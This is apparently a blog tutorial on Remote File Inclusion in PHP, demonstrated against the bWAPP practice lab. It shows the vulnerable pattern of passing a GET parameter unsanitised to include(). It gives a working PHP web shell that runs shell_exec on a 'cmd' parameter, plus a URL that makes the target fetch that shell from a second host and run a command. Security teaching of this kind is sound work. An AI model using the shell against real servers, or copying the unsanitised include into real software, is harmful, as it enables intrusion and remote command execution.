i Remote File Inclusion Attack – All things in moderation

Remote File Inclusion Attack

Introduction

Remote File Inclusion ( RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application, the web application downloads and executes a remote file. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

Example Remote File Inclusion in PHP

In order for Remote fle inclusion ,two functions in PHP’s configuration file need to be set: “allow_url_fopen=On” and “allow_url_include=On” in “php.ini” file

  • allow_url_fopen: This option enables the URL-aware fopen wrappers that enable accessing URL object like files. Default wrappers are provided for the access of remote files using the ftp or http protocol, some extensions like zlib may register additional wrappers.

  • allow_url_include: This option allows the use of URL-aware fopen wrappers with the following functions: include, include_once, require, require_once.

Consider following url:
http://192.168.28.129/bWAPP/rlfi.php?language=lang_en.php&action=go

The value of “language” parameter is taken into the following PHP code, and the file is included:

<?php

$language = $_GET["language"];

 include($language);
 
 ?>
 
 
  • Now, you can set value for language parameter with some website from internet.

Example: http://192.168.28.129/bWAPP/rlfi.php?language=http://hydrasky.com&action=go

Web application download page http://hydrasky.com and present in include() function. This mean RFI vulnerability occurred!

  • Lets create remote web shell to compromise with system shell, read file, write file … that files must not executable on the remote server, because if the malicious file execute on remote, victim server will receive HTML content.

Example http://192.168.28.1:8888/remote_shell.txt

<?php

$output = shell_exec($_GET["cmd"]);

echo "<pre> $output </pre>";

?> 

http://192.168.28.129/bWAPP/rlfi.php?language=http://192.168.28.1:8888/remote_shell.txt&action=go&cmd=ls -l

Reference

https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion

https://en.wikipedia.org/wiki/File_inclusion_vulnerability

Leave a Reply